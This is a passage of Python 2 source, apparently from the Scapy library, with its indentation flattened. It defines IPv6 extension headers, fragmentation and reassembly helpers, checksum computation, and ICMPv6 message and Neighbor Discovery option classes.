### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
provided with all under layers (IPv6 and all extension headers,
for example)
- 'p' : the payload of the upper layer provided as a string
Functions operate by filling a pseudo header class instance (PseudoIPv6)
with
- Next Header value
- the address of _final_ destination (if some Routing Header with non
segleft field is present in underlayer classes, last address is used.)
- the address of _real_ source (basically the source address of an
IPv6 class instance available in the underlayer or the source address
in HAO option if some Destination Option header found in underlayer
includes this option).
- the length is the length of provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified BytEnumField that displays information regarding the IPv6 option
based on its option type value (What should be done by nodes that process
the option if they do not understand it ...)
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every options has
an alignment requirement ususally expressed xn+y, meaning
the Option Type must appear at an integer multiple of x octest
from the start of the header, plus y octet.
That function is provided the current position from the
start of the header and returns required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Crap is dropped. What lacks is completed by 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for p in l:
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = 0
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. last Frag MTU
# can be anything below MTU
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremeted during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offSet
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# tous les messages MLD sont emis avec une adresse source lien-locale
# -> Y veiller dans le post_build si aucune n'est specifiee
# La valeur de Hop-Limit doit etre de 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return struct.pack("HH",self.mladdr)+self.payload.hashret()
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# implementer le hashret et le answers
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
